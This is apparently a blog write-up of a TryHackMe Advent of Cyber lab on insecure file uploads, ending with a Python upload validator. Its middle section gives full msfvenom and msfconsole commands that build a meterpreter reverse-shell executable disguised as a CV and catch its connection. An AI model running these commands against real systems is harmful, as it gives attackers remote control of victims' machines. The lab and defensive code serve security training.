
THM Advent of Cyber - Day 15

Today we’ll be focusing on secure coding, and while the task will mostly be about reading, there’s a small reverse shell example to try out.

Day 15

What is the name given to file uploads that allow threat actors to upload any files that they want?

We’re looking for a general term, which can be found by simply reading the article on today’s vulnerability overview.

What is the title of the web application developed by Santa’s freelancer?

To find the answer we simply need to fire up the target host and browse to http://$IP to see what the web app is called. It’s pretty close to the one shown in the sample on THM.

What is the value of the flag stored in the HR Elf’s Documents directory?

While the rest of the day is really straightforward, this part is the real meat and potatoes. What we need is a way to establish a reverse shell by exploiting the CV review workflow, where a person executes the .exe file and so gives us a way in. Obviously very unrealistic, but it proves the concept well enough.

First we need to generate the exploit itself, and for that we can use the command msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT="4444" -f exe -o cv-username.exe on Kali. This generates a small .exe file that, when run, connects back to our machine. Note the LHOST and LPORT settings; adjust them to your environment.

Next we need to set up the listener, and we can use msfconsole for this. With the one-liner sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT '4444'; exploit" we’re up and running swiftly, and then we just sit back and wait for the connection to be established.

Once the meterpreter connection is established we’re able to dig through the filesystem, and the flag can be found in the Documents directory of the HR_Elf user.

What defence technique can be implemented to ensure that specific file types can be uploaded?

The answer can once again be found in the article itself, and with the help of the asterisks it’s pretty easy to spot, given that we’re being asked about specific file types.

What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?

Here we again just keep reading the article to find the correct sub-heading.

What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?

Like with the last two, the correct answer is a sub-heading in the article itself.
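To show what the three defence questions above amount to in code, here is a hardened upload handler. It is an added example of my own, not code from the THM room or this writeup: it allowlists extensions, checks the file content (so a PE executable like the one built earlier is refused even behind a .pdf name), and stores the file under a random name the uploader cannot guess. The allowed types, magic bytes and sample uploads are assumptions constructed for the example.

```python
import secrets
import tempfile
from pathlib import Path

# Assumption: the CV review workflow only needs PDF and Word documents.
ALLOWED_EXTENSIONS = {".pdf", ".docx"}
# Leading bytes for each allowed type; the extension alone is never trusted.
MAGIC = {".pdf": b"%PDF-", ".docx": b"PK\x03\x04"}  # .docx is a ZIP container
# Windows PE executables such as the writeup's .exe start with "MZ".
PE_MAGIC = b"MZ"

class UploadRejected(Exception):
    pass

def validate_upload(filename: str, data: bytes) -> str:
    """Return the normalised extension, or raise UploadRejected."""
    ext = Path(filename).suffix.lower()  # last suffix only: cv.pdf.exe -> .exe
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} is not on the allowlist")
    if data.startswith(PE_MAGIC):
        raise UploadRejected("content is a PE executable")
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected(f"content does not look like {ext}")
    return ext

def store_upload(filename: str, data: bytes, upload_dir: Path) -> str:
    """Validate, then write under a random name the uploader cannot predict."""
    ext = validate_upload(filename, data)
    stored_name = secrets.token_hex(16) + ext  # original name is discarded
    with open(upload_dir / stored_name, "xb") as fh:  # "x": never overwrite
        fh.write(data)
    return stored_name

def demo() -> dict:
    """Run the handler over constructed uploads and return each decision."""
    upload_dir = Path(tempfile.mkdtemp())
    samples = [  # constructed inputs, not real files
        ("cv-elf.pdf", b"%PDF-1.7 constructed document body"),
        ("cv-elf.exe", b"MZ\x90\x00 constructed executable body"),
        ("cv-elf.pdf.exe", b"%PDF-1.7 hidden behind a double extension"),
        ("cv-elf.exe.pdf", b"MZ\x90\x00 executable with a lying extension"),
    ]
    decisions = {}
    for name, data in samples:
        try:
            decisions[name] = "stored as " + store_upload(name, data, upload_dir)
        except UploadRejected as exc:
            decisions[name] = f"rejected: {exc}"
    return decisions
```

Only the first sample is written to disk; the other three are refused before any file is created, and the stored file's name shares nothing with what the uploader supplied.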

This post is licensed under CC BY 4.0 by the author.